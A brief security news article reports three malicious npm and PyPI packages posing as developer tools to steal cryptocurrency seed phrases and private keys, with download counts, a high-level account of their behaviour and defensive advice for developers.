Impersonated Dev Tools on npm/PyPI Used for Credential Theft

The Socket Threat Research Team has discovered three malicious open-source packages—two on PyPI and one on npm—designed to steal sensitive cryptocurrency data like mnemonic seed phrases and private keys.

These packages were disguised as developer tools and released between 2021 and 2024. Despite their malicious intent, they were downloaded thousands of times, showing a dangerous rise in supply chain attacks in open-source ecosystems.

Crypto Theft Hidden in Developer Tools

• The npm package react-native-scrollpageviewtest, pretending to help with page scrolling, was downloaded 1,215 times.
  Once installed, it accessed wallet engines, stole sensitive data, encoded it in Base64, and sent it to a control server using Google Analytics to avoid suspicion.
• On PyPI, two similar packages, web3x and herewalletbot, used different tactics:
  • web3x appeared as an Ethereum wallet checker with over 3,400 downloads. It tricked users into entering their seed phrases and sent them to a Telegram bot.
  • herewalletbot, with 3,425 downloads, guided users via a Telegram chat, quietly collecting their mnemonic phrases.

These threats show how attackers are embedding malware into developer tools, taking advantage of the trust placed in open-source packages. The presence of these malicious packages for years highlights the need for better security in the software supply chain.

Developers and teams should:

• Review source code before using packages
• Monitor app behavior at runtime
• Analyze dependencies for hidden threats

Never share your seed phrase or private keys, and always treat any request for them as suspicious. If you come across such a package, report it immediately.

Indicators of Compromise (IOCs)

‍Follow Us on: Twitter, Instagram, Facebook to get the latest security news!